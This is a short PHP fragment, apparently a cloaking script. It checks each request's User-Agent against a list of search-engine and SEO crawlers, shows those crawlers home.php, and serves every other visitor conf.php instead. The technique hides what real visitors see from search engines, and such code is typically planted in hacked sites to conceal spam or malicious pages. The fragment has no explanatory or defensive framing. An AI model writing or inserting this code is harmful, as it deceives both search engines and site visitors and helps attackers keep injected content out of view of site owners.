function is_google_bot() { if (isset($_SERVER['HTTP_USER_AGENT'])) { $user_agent = $_SERVER['HTTP_USER_AGENT']; $google_agents = ['Googlebot','Googlebot-Image','Googlebot-News','Googlebot-Video','Storebot-Google','Google-InspectionTool','GoogleOther','GoogleOther-Image','GoogleOther-Video','Google-CloudVertexBot','Google-Extended','APIs-Google','AdsBot-Google-Mobile','AdsBot-Google','Mediapartners-Google','FeedFetcher-Google','Google-Favicon','Google Favicon','Googlebot-Favicon','Google-Site-Verification','Google-Read-Aloud','GoogleProducer','Google Web Preview','Bingbot','Slurp','DuckDuckBot','Baiduspider','YandexBot','Sogou','Exabot','facebookexternalhit','ia_archiver','Alexa Crawler','AhrefsBot','Semrushbot']; foreach ($google_agents as $agent) { if (stripos($user_agent, $agent) !== false) { return true; } } } return false; } if (is_google_bot()) { include __DIR__ . '/home.php'; } else { include('conf.php'); exit; } ?>